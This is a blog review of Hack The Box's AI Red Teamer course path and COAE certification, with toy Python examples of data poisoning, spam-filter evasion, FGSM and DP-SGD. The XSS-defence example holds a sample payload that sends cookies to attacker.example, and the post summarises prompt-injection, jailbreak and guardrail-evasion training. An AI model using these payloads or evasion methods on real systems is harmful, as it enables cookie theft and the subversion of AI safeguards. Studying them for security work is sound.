Hack The Box Academy: AI Red Teamer & COAE

HTB Certified Offensive AI Expert (COAE) | Course & Certification Review

Overview

Course & Certification at a Glance

Hack The Box Academy's AI Red Teamer Job Role Path and its associated HTB Certified Offensive AI Expert (COAE) certification together form the most comprehensive machine-learning-focused offensive AI security training package available today. Developed in collaboration with Google and aligned with Google's Secure AI Framework (SAIF), the complete package takes learners from foundational AI/ML concepts through advanced adversarial techniques and validates those skills with a demanding 7-day practical exam. The course spans 12 modules covering the full spectrum of AI attack surfaces: prompt injection, model privacy attacks, adversarial evasion, supply chain risks, and deployment-level vulnerabilities. The COAE exam then puts all of that knowledge to the test in a simulated corporate AI environment, requiring a commercial-grade report as the final deliverable.

Overall, I thought the complete package was excellent. This is the first certification I have taken that incorporates high-level mathematics, and working through the course and then applying it under exam conditions genuinely made my thinking more systematic. Concepts like gradient descent, norm constraints, and adversarial perturbation theory are not the kind of material you encounter in traditional offensive security certifications, and engaging with them here gave me a fundamentally deeper understanding of how these systems work. My grasp of machine learning and AI is significantly greater than it was going in, at both the academic level (understanding the math and theory behind models) and the operational level (knowing how to exploit and assess real-world AI systems). If you are a security professional looking to develop genuine competency in AI red teaming rather than surface-level familiarity, this is the training and certification I would recommend.

This review covers both the course content in depth (module by module) and the COAE certification exam experience.

Part 1: The Course (AI Red Teamer Path)

Overall Course Review

The course is structured as a deliberate progression. The first three modules lay the groundwork: AI/ML fundamentals, hands-on model development in Python, and an introduction to the AI threat landscape through the OWASP and Google SAIF frameworks. From there, it moves into offensive techniques: prompt injection, LLM output exploitation, data poisoning, application and system-layer attacks, and the three-module evasion trilogy that covers increasingly advanced adversarial mathematics. The path closes with two defensive modules on AI privacy and AI defense, rounding out both sides of the equation.

This path fundamentally changed how I view machine learning systems. The early modules build intuition around how AI works, while the later modules, particularly the evasion trilogy and data attacks, dive deep into the mathematics of adversarial machine learning. Expect to hit walls with the math. I found ChatGPT invaluable for decoding unfamiliar mathematical notation and building the intuition needed to really understand these attacks. The struggle is worth it: by the end you'll understand not just how to break AI systems, but why the attacks work at a fundamental level and how to defend against them.

What sets this path apart is its dual focus on offense and defense. Throughout the modules, attack techniques are paired with mitigations, and the final modules on AI Privacy and AI Defense ensure you can secure the systems you've learned to compromise. The integration of Google's SAIF and OWASP Top 10 frameworks early on provides mental scaffolding that pays dividends as you progress through increasingly technical content.

The path drives home that AI systems are vulnerable at every layer (model, data, application, and system) and that traditional web vulnerabilities like XSS, SQLi, and command injection compound with AI-specific risks in ways that are often overlooked. You'll develop mathematical intuition around norms, gradients, and optimization that's essential for understanding adversarial ML at a fundamental level. While jailbreaks and prompt injection are the entry point that most people think of, data poisoning and evasion attacks are where the deep exploitation happens. You'll also learn that defensive measures like adversarial training, DP-SGD, and guardrails come with real tradeoffs against model utility: there's no free lunch in AI security.


If you're serious about AI security, this course is the real deal.

Module Reviews

Module 1: Fundamentals of AI


Created by PandaSt0rm, this foundational module clocks in at around 8 hours across 24 sections of pure theory, no hands-on exercises, no labs, just a deep dive into the concepts that underpin AI systems. It serves as both an approachable introduction and a reference you'll come back to throughout the path. The content spans five major domains:

The module touches on mathematical foundations but doesn't make them the focus. That said, having some background in statistics, linear algebra, and calculus will make the content click faster. If you're coming in cold on the math, expect to do some supplementary reading.

Rated Medium difficulty at Tier 0, I'd say that's spot on. No multivariable calculus or actual coding here, but the topics are certainly more advanced than your typical intro material. Overall an extremely solid survey of AI and machine learning and a wonderful place to start the learning journey.



Module 2: Applications of AI in InfoSec

Created by PandaSt0rm with vautia, this 25-section module spans roughly 8 hours and is where theory meets practice. You'll build a complete AI development environment from scratch using Miniconda for package management and JupyterLab for interactive experimentation, then work through the entire model development lifecycle from raw data to trained classifiers.

The module covers:

The module recommends setting up your own environment rather than using the provided VM for better training performance. A machine with at least 4GB RAM and a reasonably modern multi-core CPU will serve you well here. GPU is optional but helpful.

Rated Medium and costed at Tier 0, I'd say that's spot on. The module guides you through each step in detail without leaving you stranded. What I thoroughly enjoyed was how applicable everything felt. By the end I had working proof-of-concept models for real-world cybersecurity use cases: spam detection, network anomaly detection, and malware classification. That's not just theory; that's something you can actually build on.

Module 3: Introduction to Red Teaming AI


Created by vautia, this 11-section module runs about 4 hours and shifts gears from building AI systems to breaking them. It's the bridge between the foundational modules and the attack-focused content ahead, giving you the threat landscape overview before diving into specific exploitation techniques.

The module covers three core frameworks:

From there, it breaks down attack surfaces by component:

Prerequisites are the previous two modules (Fundamentals of AI and Applications of AI in InfoSec), which makes sense - you need to understand how these systems work before you can break them.

Rated Medium and costed at Tier I, this is an excellent introduction to secure AI and AI red teaming. What I particularly enjoyed was the early introduction of the Google SAIF and OWASP Top 10 frameworks. Having these in the back of your mind as you dive deeper into the technical topics gives you a mental scaffold to hang everything on.



Module 4: Prompt Injection Attacks

Created by vautia, this 12-section module runs about 8 hours and marks your entry into Tier II offensive content. It's a comprehensive deep dive into one of the most prominent attack vectors against large language models: prompt injection.

The module covers four main areas:

You'll start with prompt engineering fundamentals, move through reconnaissance techniques, then work through increasingly sophisticated injection and jailbreak methods. The "Tools of the Trade" section introduces automation and tooling for prompt injection testing.

Prerequisites build on everything prior: Fundamentals of AI, Applications of AI in InfoSec, and Introduction to Red Teaming AI.

Rated Medium and costed at Tier II, I thoroughly enjoyed this module as it introduces the kind of thinking required to perform adversarial AI testing. The different jailbreaking techniques provide a lot of real-world value, and honestly, when people think of AI pentesting, jailbreaks are what they tend to think of first. This module delivers on expectations.



Module 5: LLM Output Attacks

Created by vautia, this 14-section module runs about 8 hours and flips the script from input manipulation to output exploitation. Where prompt injection focuses on what goes into an LLM, this module examines what comes out and how that output can compromise systems.

The module covers traditional web vulnerabilities in an LLM context:

It also covers abuse attacks, the weaponization side of LLMs: hate speech campaigns, misinformation generation, and the detection and mitigation of these attacks. The module wraps up with safeguard case studies and legislative regulation, grounding the technical content in real-world policy.

Prerequisites are notably heavier here, requiring both the AI path modules (Fundamentals, Applications, Intro to Red Teaming, Prompt Injection) plus traditional web security knowledge (XSS, SQL Injection Fundamentals, Command Injections).

Rated Medium and costed at Tier II, this module is highly relevant to real-world work. It introduces the layer of traditional security vulnerabilities and demonstrates how they compound with AI technologies. While not overly technically deep, it continues introducing learners to the attack surface of AI systems and how it's exploited. The combination of classic web vulns with LLM contexts is exactly what you'll encounter in production AI applications. As with other modules in the path, it pairs offensive techniques with their corresponding defenses, reinforcing that red teaming is ultimately about improving security posture, not just finding holes.
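To make the "LLM output is untrusted input" point concrete, here is a minimal sketch that is not taken from the course material. It assumes a hypothetical chat front end that places the model's reply inside an HTML page; the function name `render_llm_reply` and the `bot-message` class are illustrative only. The idea is simply that model output gets escaped exactly like any other user-controlled string before it reaches the browser.

```python
import html


def render_llm_reply(reply: str) -> str:
    """Wrap an untrusted LLM reply in a chat bubble, escaping HTML first.

    Hypothetical helper for illustration; a real application would also
    rely on its template engine's auto-escaping and a content security policy.
    """
    # Treat model output like any other attacker-influenced input.
    safe = html.escape(reply, quote=True)
    return f'<div class="bot-message">{safe}</div>'


# A reply that a prompt-injected model might be coaxed into producing.
malicious = 'Sure! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
rendered = render_llm_reply(malicious)
print(rendered)
```

Without the `html.escape` call, the script tag would be delivered to the browser verbatim, which is the classic XSS outcome the module describes in an LLM context.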



Module 6: AI Data Attacks

Created by PandaSt0rm, this 25-section module is estimated at 3 days and marks the first Hard-rated content in the path. Where previous modules focused on prompt-level and output-level attacks, this one goes deeper into the data pipeline itself, targeting the foundation that AI systems are built on.

The module covers several sophisticated attack categories:

The hands-on content is substantial, walking through baseline model creation, attack implementation, and evaluation for each technique. You'll work with logistic regression, CNN architectures, and custom attack tooling.
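The baseline, attack, evaluate loop described above can be sketched in a few lines. This is a toy illustration under stated assumptions, not code from the module: it uses label flipping (one common form of data poisoning) against a one-dimensional nearest-centroid classifier, and all data points are invented for the example.

```python
def train_threshold(points):
    """Fit a 1-D nearest-centroid classifier: the decision threshold is
    the midpoint between the mean of class 0 and the mean of class 1."""
    zeros = [x for x, y in points if y == 0]
    ones = [x for x, y in points if y == 1]
    return (sum(zeros) / len(zeros) + sum(ones) / len(ones)) / 2


def accuracy(threshold, points):
    """Fraction of points where 'x > threshold' agrees with the label."""
    return sum((x > threshold) == (y == 1) for x, y in points) / len(points)


# Baseline: clean training data (toy values, assumed for illustration).
clean_train = [(1.0, 0), (2.0, 0), (3.0, 0), (6.0, 1), (7.0, 1), (8.0, 1), (9.0, 1)]

# Attack: the adversary flips the labels of three class-1 training points.
flipped = {6.0, 7.0, 8.0}
poisoned_train = [(x, 0 if x in flipped else y) for x, y in clean_train]

# Evaluation: compare both models on the same clean test set.
test_set = [(2.5, 0), (3.5, 0), (6.0, 1), (6.5, 1), (8.5, 1)]
clean_acc = accuracy(train_threshold(clean_train), test_set)
poisoned_acc = accuracy(train_threshold(poisoned_train), test_set)
print(f"clean model accuracy:    {clean_acc:.2f}")
print(f"poisoned model accuracy: {poisoned_acc:.2f}")
```

The flipped labels drag the class-0 mean upward, which shifts the decision threshold and causes legitimate class-1 test points to be misclassified.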

Prerequisites include the core AI path modules plus strong Python skills and Jupyter Notebook familiarity. HTB highly recommends using your own machine for the practicals rather than the provided VM, as the training workloads benefit from local compute.

Rated Hard and costed at Tier II, I ran into the math like it was a brick wall. Luckily I was able to use ChatGPT to decode the mathematical symbols I didn't know and began developing the mathematical intuition required to really understand and exploit AI systems. The Hard rating is truly justified: this will be the first real roadblock in the course pathway for many learners. If you've been coasting on the Medium modules, expect to slow down here.

Module 7: Attacking AI - Application and System


Created by vautia, this 14-section module runs about 8 hours and zooms out from model and data attacks to examine the application and system layers of AI deployments. After the math-heavy data attacks module, this returns to Medium difficulty while covering equally critical attack surfaces.

The module covers application and system component vulnerabilities:

A significant portion focuses on the Model Context Protocol (MCP), the AI orchestration protocol introduced in 2024. You'll get a practical introduction to how MCP works, then dive into attacking vulnerable MCP servers and the risks of malicious MCP servers, with mitigations to round it out.

Prerequisites include the AI path modules plus SQL Injection Fundamentals, Command Injections, and Web Attacks.

Rated Medium and costed at Tier II, this module is an excellent blend of classic attack vectors (command injection, SQLi, info disclosure) with modern AI exploitation via MCP. It clearly shows how legacy flaws and AI risks combine, making this a highly valuable and insightful module. A welcome return to Medium and a little less math after the Hard data attacks module.

Module 8: AI Evasion - Foundations


Created by PandaSt0rm, this 12-section module runs about 8 hours and kicks off the three-module evasion series. It introduces inference-time evasion attacks, techniques that manipulate inputs to bypass classifiers or force targeted misclassifications at prediction time.

The module establishes the evasion threat model:

You'll build and attack a spam filter using the UCI SMS dataset, implementing GoodWords attacks in both white-box and black-box settings. The black-box content covers operating under query limits, including candidate vocabulary construction, adaptive selection strategies, and small-combination testing to minimize detection.
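As a rough illustration of the white-box GoodWords idea, here is a minimal sketch that is not the module's implementation. It assumes a linear spam filter whose per-word weights are fully visible to the attacker; the weights, the bias, and the function names are all hypothetical. The attack appends the most ham-indicative words until the score drops to the ham side.

```python
# Hypothetical per-word weights of a linear spam filter (positive = spammy).
WEIGHTS = {
    "free": 2.0, "winner": 2.5, "prize": 1.5, "claim": 1.0,
    "meeting": -1.5, "thanks": -1.25, "tomorrow": -1.0, "lunch": -0.75,
}
BIAS = -0.5


def spam_score(tokens):
    """Linear score over the set of words present; > 0 means spam."""
    return BIAS + sum(WEIGHTS.get(t, 0.0) for t in set(tokens))


def good_words_attack(tokens, max_words=10):
    """White-box GoodWords sketch: append the most ham-indicative words
    (most negative weights first) until the message is no longer flagged."""
    present = set(tokens)
    candidates = sorted(
        (w for w, v in WEIGHTS.items() if v < 0 and w not in present),
        key=lambda w: WEIGHTS[w],
    )
    adversarial, added = list(tokens), []
    for word in candidates[:max_words]:
        if spam_score(adversarial) <= 0:
            break  # already classified as ham, stop adding words
        adversarial.append(word)
        added.append(word)
    return adversarial, added


message = ["free", "claim"]
adv_message, added_words = good_words_attack(message)
print("original score:", spam_score(message))
print("added words:", added_words)
print("adversarial score:", spam_score(adv_message))
```

In the black-box setting the attacker has no access to `WEIGHTS` and has to estimate which words are "good" from a limited number of queries, which is where the candidate vocabulary and adaptive selection strategies mentioned above come in.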

Prerequisites build on the full path so far including the AI Data Attacks module. Strong Python skills and Jupyter Notebook familiarity are mandatory, and HTB highly recommends using your own machine for the practicals.

Rated Medium and costed at Tier II, this is when the course starts getting really into the weeds, readying you for deeper mathematical attacks and adversarial machine learning in the modules ahead. A great module for building intuition around machine learning and how to attack the models themselves, not just the applications around them.



Module 9: AI Evasion - First-Order Attacks

Created by PandaSt0rm, this 23-section module is estimated at 2 days and returns to Hard difficulty. It takes gradient-based adversarial techniques from theory to implementation, exploiting the differentiable structure of neural networks to craft perturbations that force misclassifications.

The module covers the core first-order attack methods:

Each attack includes full implementation, evaluation metrics, and visualization. The module has two skills assessments, reflecting the depth of content.
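To give a feel for what a first-order attack looks like, here is a minimal FGSM sketch against a hand-written logistic regression model. It is an illustration under stated assumptions, not the module's code: the weights, the input, and the `eps` budget are invented, and a real attack would target a neural network through an autodiff framework rather than a closed-form gradient.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def predict(w, b, x):
    """Probability of class 1 under a logistic regression model."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)


def fgsm(w, b, x, y, eps):
    """One-step FGSM: x_adv = x + eps * sign(dLoss/dx).

    For logistic regression with binary cross-entropy loss, the gradient
    of the loss with respect to input feature i is (p - y) * w_i.
    """
    p = predict(w, b, x)
    grad = [(p - y) * wi for wi in w]
    sign = [(g > 0) - (g < 0) for g in grad]  # elementwise sign in {-1, 0, 1}
    return [xi + eps * s for xi, s in zip(x, sign)]


# Toy model and input (assumed values for illustration).
w, b = [2.0, -1.0, 0.5], 0.0
x, y = [0.5, 0.25, 0.5], 1

x_adv = fgsm(w, b, x, y, eps=0.5)
print("clean prediction:      ", round(predict(w, b, x), 3))
print("adversarial prediction:", round(predict(w, b, x_adv), 3))
print("adversarial input:     ", x_adv)
```

Every feature moves by exactly `eps` in the direction that increases the loss, so the perturbation is bounded in the L-infinity norm, which is the constraint FGSM is built around.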

Prerequisites include all previous AI modules plus basic understanding of neural networks and gradient computation. Strong Python and Jupyter skills are mandatory, and using your own machine is highly recommended. I also highly recommend using ChatGPT to help you understand the mathematical concepts; it's a powerful tool and will help you greatly.

Rated Hard and costed at Tier II, this was another module where I ran into a brick wall with the mathematics. At first much of the content was hieroglyphics to me, but I was eventually able to understand it, and it fundamentally began to change the way I view the world and systems. The mathematical intuition gained here is second to none when it comes to how machine learning actually works and how it's exploitable. Worth the struggle.



Module 10: AI Evasion - Sparsity Attacks

Created by PandaSt0rm, this 28-section module is estimated at 3 days and is the most technically dense of the evasion trilogy. Where first-order attacks focus on minimizing perturbation magnitude, sparsity attacks flip the constraint: minimize how many features change, not how much they change.

The module covers the mathematical foundations and implementations:

The hands-on content is extensive, covering environment setup, implementing FISTA components, loss gradients, binary search, attack execution, visualizations, and sparsity analysis for both ElasticNet and JSMA approaches.

Prerequisites include all previous AI modules through First-Order Attacks, plus understanding of neural networks, gradient computation, and optimization methods. Own machine highly recommended.

Rated Hard and costed at Tier II, this one is much like the last, very tough on the mathematics. But the intuition gained is transformative, especially around the different norms (L0, L1, L2, L_inf) and how they interact. It also gave insight into how adversarial algorithms are conceived and developed, not just how to use them. You'll leave understanding why these attacks work, not just that they work.
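The difference between the norms is easier to see with numbers. The sketch below, which uses made-up perturbations rather than anything from the module, computes L0, L1, L2, and L_inf for a dense perturbation (small change on every feature) and a sparse one (large change on a single feature).

```python
import math


def perturbation_norms(x, x_adv):
    """Return the L0, L1, L2 and L_inf norms of the perturbation x_adv - x."""
    delta = [a - b for a, b in zip(x_adv, x)]
    return {
        "L0": sum(1 for d in delta if d != 0),    # how many features changed
        "L1": sum(abs(d) for d in delta),         # total absolute change
        "L2": math.sqrt(sum(d * d for d in delta)),  # Euclidean size
        "Linf": max(abs(d) for d in delta),       # largest single change
    }


x = [0.0] * 8
dense = [0.125] * 8          # small change on every feature
sparse = [0.0] * 7 + [1.0]   # one large change, everything else untouched

dense_norms = perturbation_norms(x, dense)
sparse_norms = perturbation_norms(x, sparse)
print("dense: ", dense_norms)
print("sparse:", sparse_norms)
```

Both perturbations have the same L1 norm, yet the dense one is far smaller under L_inf while the sparse one is far smaller under L0. That is the tradeoff the sparsity attacks exploit: they accept larger per-feature changes in exchange for touching as few features as possible.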



Module 11: AI Privacy

Created by PandaSt0rm, this 21-section module is estimated at 2 days and is notably the first Defensive-focused module in the path. It explores the privacy dimension of AI security, both the attacks that extract sensitive information from trained models and the defenses that protect against them.

The attack side covers Membership Inference Attacks (MIA):

The defense side covers differential privacy approaches:

Prerequisites include all previous AI modules, plus solid PyTorch familiarity and understanding of neural network training and optimization. Own machine is highly recommended over Pwnbox.

Rated Medium and costed at Tier II, I found this module informative in showing how membership inference attacks work and how models can be secured through training methods. Honestly, I thought it could have been rated Hard: the math and algorithms pushed the limits of what I'd consider Medium territory. What I found particularly valuable was seeing the ML training side in more depth, understanding how different training approaches (standard vs DP-SGD vs PATE) produce models with fundamentally different security properties, and the concrete tradeoffs between privacy guarantees and model utility.
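For readers who have not met DP-SGD before, the core gradient step is short enough to sketch. This is a simplified illustration, not the module's implementation and not a production library: the function names, `max_norm`, and `noise_multiplier` are assumptions for the example, and privacy accounting (tracking the epsilon budget) is left out entirely. The two key moves are clipping each example's gradient to a fixed L2 norm and adding Gaussian noise scaled to that clipping bound before averaging.

```python
import math
import random


def clip(grad, max_norm):
    """Scale a gradient vector down so its L2 norm is at most max_norm."""
    norm = math.sqrt(sum(g * g for g in grad))
    scale = min(1.0, max_norm / norm) if norm > 0 else 1.0
    return [g * scale for g in grad]


def dp_sgd_gradient(per_example_grads, max_norm, noise_multiplier, rng):
    """Simplified DP-SGD aggregation: clip each example's gradient, sum,
    add Gaussian noise with std = noise_multiplier * max_norm, then average."""
    clipped = [clip(g, max_norm) for g in per_example_grads]
    dim = len(clipped[0])
    summed = [sum(g[i] for g in clipped) for i in range(dim)]
    noisy = [s + rng.gauss(0.0, noise_multiplier * max_norm) for s in summed]
    return [n / len(per_example_grads) for n in noisy]


# Toy per-example gradients: the first one is an outlier with L2 norm 5.
grads = [[3.0, 4.0], [0.3, 0.4]]
rng = random.Random(0)

no_noise = dp_sgd_gradient(grads, max_norm=1.0, noise_multiplier=0.0, rng=rng)
with_noise = dp_sgd_gradient(grads, max_norm=1.0, noise_multiplier=1.0, rng=rng)
print("clipped average, no noise:  ", no_noise)
print("clipped average, with noise:", with_noise)
```

Clipping limits how much any single training example can influence the update, and the noise hides whatever influence remains. Both also distort the true gradient, which is where the privacy versus utility tradeoff comes from.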



Module 12: AI Defense

Created by vautia with PandaSt0rm, this 21-section capstone module is estimated at 2 days and brings everything full circle. After spending the path learning to attack AI systems, you now learn to defend them, understanding both sides of the adversarial equation.

The module covers three main defensive approaches:

LLM Guardrails (application-layer defenses):

Model-level Defenses:

The module also covers advanced prompt injection tactics like priming attacks and how to evade guardrails, giving you both the offensive and defensive perspective.

Prerequisites include the core AI modules plus the evasion modules. Note that running the adversarial training and tuning code requires powerful hardware, but doing so is optional: you can complete the module without running it yourself.

Rated Medium and costed at Tier II, this was a wonderful capstone to the course. It covers advanced techniques while tying everything together and pushing the path over the line from educational to practically useful. This is the module that enables effective AI red teaming against real systems with safeguards in place. What I particularly appreciated was how it equips you not just to attack AI systems and find vulnerabilities, but to secure them and defend against the very attacks you've learned. That dual perspective is what separates a red teamer from just a hacker.

Part 2: The Certification (HTB COAE)

Certification Overview



The HTB Certified Offensive AI Expert (COAE) is Hack The Box's professional-grade certification for AI red teaming, launched on April 2, 2026. It serves as the capstone credential for the AI Red Teamer Job Role Path and is designed to validate a candidate's ability to assess complex AI environments in a real-world setting. This is not a theoretical exercise or a multiple-choice quiz. The COAE requires you to demonstrate that you can actually perform offensive AI assessments under pressure.

The certification was created alongside the AI Red Teamer path, which was developed in collaboration with Google and aligned with Google's Secure AI Framework (SAIF). HTB positions the COAE as a credential that separates the curious from the experts, going far beyond basic prompt injection to cover the full spectrum of AI and ML vulnerabilities. As organizations rush to integrate LLMs and AI into their operations, the gap in specialized AI security talent is growing rapidly, and the COAE is designed to fill that gap.

As HTB puts it: "When you hold the HTB COAE, you are telling the world that you don't just understand the theory of AI security, but that you have the hands-on experience to defend the next generation of technology."

Exam Format & Objectives

Exam Details

The COAE exam places candidates in a simulated corporate environment where they must perform a full-scale AI offensive assessment. The course syllabus spans the following domains, all of which are fair game for the exam:

Successful completion requires submitting a commercial-grade technical report documenting findings, exploitation steps, and recommended mitigations. This mirrors the deliverables expected in professional AI security assessments.

Exam Experience & Tips

I completed the AI Red Teamer course path in mid-January 2026, which gave me a couple of months to review my notes and refine my tooling before the COAE exam launched on April 2nd. That preparation time made a significant difference. When the exam went live, I moved fast with the goal of achieving first blood on the certification. I wrapped the core engagement in about 10 hours of focused work, leaving some points on the table and finishing at 85 out of 100 exam points. The certification was officially issued on April 9, 2026. To my knowledge I was first blood on the exam, and among the first people to hold the COAE.

Exam progress after the main push: 85/100 points with most of the 7-day window still available (6 days, 14 hours remaining on the timer).

Platform badge (to my knowledge, first blood; among the first COAE earners on Hack The Box)

The exam maps closely to what is taught in the course. If you have genuinely worked through all 12 modules and understood the material, there should be no surprises in terms of the techniques and concepts tested. The difficulty was about what I expected based on the course content.

Here is the key insight that I want to emphasize: concepts that felt impossibly difficult the first time through the course become recognizable patterns during the exam. Things like gradient descent, norm constraints, saliency maps, and adversarial perturbation techniques were brick walls when I first encountered them in the Hard-rated modules. But during the exam, I was able to quickly recognize what I was looking at and knew exactly what approach to take. The struggle of learning these concepts the first time is what builds the intuition needed to apply them under pressure.

Top Tip: Use Jupyter Notebooks Throughout the Course

My single biggest recommendation for anyone planning to take the COAE: use Jupyter notebooks to solve the course exercises rather than just following along. Build reusable code blocks for every technique you learn.

During the exam, having those notebooks ready was invaluable. When I recognized a pattern, I already had working, tested code on hand to execute quickly. The difference between "I understand this concept" and "I have a working implementation I can adapt in minutes" is the difference between finishing in hours versus days.

Comparisons & Recommendations

HTB COAE vs OffSec OSAI+

The most direct comparison for the HTB COAE is OffSec's AI-300: Advanced AI Red Teaming (OSAI+), which launched around the same time and targets the same emerging discipline. I have not taken the OSAI+ at the time of writing, so this comparison is based on publicly available course descriptions, syllabus details, and exam format information rather than firsthand experience. That said, both certifications validate hands-on offensive AI skills through practical exams rather than multiple-choice tests. Here is how they compare on paper:

| | HTB COAE | OffSec OSAI+ |
|---|---|---|
| Provider | Hack The Box Academy | OffSec |
| Course Level | Job Role Path (12 modules, 230 sections) | 300-level (50-100 hours of content) |
| Developed With | Google (SAIF Framework) | OffSec internal |
| Exam Format | 7-day practical + report | 24-hour proctored practical |
| Exam Style | Full-scale AI offensive assessment in simulated corporate environment | Red team engagement against AI-enabled enterprise environment |
| Key Topics | Adversarial ML (FGSM, DeepFool, JSMA, EAD), data poisoning, prompt injection, evasion math (norms, gradients), AI privacy (MIA, DP-SGD, PATE), AI defense | LLM attacks, multi-agent AI systems, RAG pipelines, embeddings, AI infrastructure, cloud security for AI |
| Math Depth | Heavy (gradient computation, norm constraints, optimization, saliency maps) | Moderate (applied, less theoretical math emphasis) |
| Emphasis | Full AI/ML attack lifecycle: model, data, application, system, and defense | Practical red teaming of production AI infrastructure and agent systems |
| Pricing | $210 standalone exam (2 attempts); ~$490 Silver Annual (full Academy access to required modules + exam voucher) | Starting at $1,749 (course + cert bundle) or $2,749/year (Learn One) |
| Cert Validity | Lifetime (HTB standard) | 3 years (OSAI+) |

Based on the published syllabi, the two certifications have meaningfully different emphasis. The HTB COAE goes deep into the mathematics of adversarial machine learning: you will spend serious time on gradient computation, norm constraints, FGSM, DeepFool, JSMA, and EAD. The course builds genuine mathematical intuition around how and why these attacks work at a fundamental level. It also covers data poisoning, membership inference, and differential privacy in significant depth, and pairs every offensive module with defensive strategies.

From what OffSec has published, the OSAI+ appears to lean more heavily into practical red teaming of modern AI infrastructure: multi-agent systems, RAG pipelines, embeddings, and cloud environments supporting AI deployments. The 24-hour proctored format is classic OffSec, and the course benefits from OffSec's long track record of building practical offensive certifications. I plan to take this one as well and will update this comparison with firsthand impressions when I do.

On paper, the two look complementary rather than competitive. If you want to deeply understand how adversarial ML works at a mathematical level and cover the full attack lifecycle from model to defense, the HTB path and COAE are a strong choice. If you are more focused on red teaming production AI infrastructure (agents, RAG, cloud) with less emphasis on the underlying math, the OffSec OSAI+ may be a better fit. Ideally, pursuing both would give you the theoretical foundation from one and the applied infrastructure skills from the other.

Who Is This For?

The AI Red Teamer path and COAE certification are designed for:

A strong foundation in Python, basic machine learning concepts, and traditional web application security will make the path significantly more approachable. The Hard-rated modules (AI Data Attacks, First-Order Attacks, Sparsity Attacks) require comfort with mathematical notation and optimization concepts, though the course does build toward these progressively.

Final Verdict

The AI Red Teamer path delivers on its promise. The content is estimated at 19 days, and it took me about 2 months to complete while balancing other commitments. That time investment was worth every hour. The path takes you from zero AI security knowledge to being capable of performing meaningful offensive assessments against AI systems, while also equipping you to recommend and implement defenses. The collaboration with Google shows in the quality and real-world relevance of the content.

This is not an easy path. The Medium-rated modules are genuinely Medium, and the Hard-rated modules (AI Data Attacks, First-Order Attacks, Sparsity Attacks) will challenge anyone without a strong mathematical background. But that challenge is precisely what makes the learning valuable. You'll emerge with skills that are genuinely rare in the security industry.

Ready to become an AI Red Teamer? Check out the AI Red Teamer path on HTB Academy and the HTB COAE certification page.